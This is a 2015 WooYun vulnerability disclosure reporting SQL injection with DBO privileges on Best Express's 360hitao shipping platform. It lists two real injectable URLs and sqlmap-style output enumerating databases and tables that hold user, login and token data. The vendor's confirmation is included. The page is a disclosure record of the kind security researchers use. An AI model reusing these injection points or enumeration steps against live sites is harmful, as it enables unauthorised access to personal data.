当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143694

漏洞标题:百世旗下海淘转运平台多处SQL DBO权限注入(21W用户信息泄漏)

相关厂商:百世汇通

漏洞作者: YHZX_2013

提交时间:2015-09-27 13:47

修复时间:2015-11-11 21:06

公开时间:2015-11-11 21:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-27: 细节已通知厂商并且等待厂商处理中
2015-09-27: 厂商已经确认,细节仅向厂商公开
2015-10-07: 细节向核心白帽子及相关领域专家公开
2015-10-17: 细节向普通白帽子公开
2015-10-27: 细节向实习白帽子公开
2015-11-11: 细节向公众公开

简要描述:

RT,随便翻到了两处注入点……
可以以DBO权限执行任意sql指令……
count(*)得到的数据,215633

详细说明:

注入点:
http://member.360hitao.com/Store_Rebates/azIndexInside.aspx?Letter=O
http://member.360hitao.com/store_rebates/store/storedetailcoupon.aspx?cat=36075162379976567
都是GET型注入。
available databases [8]:
[*] bestweb
[*] btrweb
[*] eshop
[*] hitaodb
[*] master
[*] model
[*] msdb
[*] tempdb
Database: hitaodb
[87 tables]
+------------+
| AAEOPS |
| AC01 |
| AC02 |
| AU11 |
| Api_BasAWB |
| Api_Notice |
| Api_Stock |
| BAS_BRANCH |
| BAS_City |
| BAS_Code |
| BAS_Group |
| BAS_Item |
| BAS_Org |
| BAS_Region |
| BAS_State |
| BAS_VSL |
| BUSI_SIGN |
| Bas_Org2 |
| BuyForMe |
| CES_Answer |
| CrawlThan |
| JobLog |
| Media |
| Menu |
| Menu_Right |
| Module |
| SSO_Token |
| Sheet1$ |
| StockOut |
| StoryTag |
| SumCu |
| TB_Admin |
| TB_Area |
| TB_Article |
| User_Group |
| User_Info |
| WMS_Goods |
| WMS_Price |
| WMS_Trans |
| WebPart |
| SZ-DHL |
| SZ-UPSS |
| UPSEX分区$ |
| UPS分区$ |
| au10 |
| au_06_01 |
| bas_code2 |
| bfmOrders |
| bfmPayer |
| bfmPayment |
| busi_topic |
| ebates_pay |
| faq_Menus |
| kpi_daily |
| kpi_email |
| kpi_outbox |
| login_info |
| osAsked |
| osNames |
| osNamesID |
| osPortPost |
| osPostSale |
| osPostShip |
| osSaleTop |
| osSender |
| osSenderID |
| osShipArea |
| osShipCity |
| osShipList |
| osShipNote |
| osShipRout |
| osShipTax |
| osShipTemp |
| osShipType |
| osShipUser |
| osUserAu |
| osUserList |
| ou_06 |
| pick_store |
| product |
| sheet |
| shit_tmp |
| sl_temp |
| store |
| sumM |
| tb |
| temp |
+------------+

漏洞证明:

2.jpg


1.jpg


3.jpg

修复方案:

版权声明:转载请注明来源 YHZX_2013@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-09-27 21:04

厂商回复:

您好,漏洞确认存在,已经在处理。感谢您对百世安全的关注!

最新状态:

暂无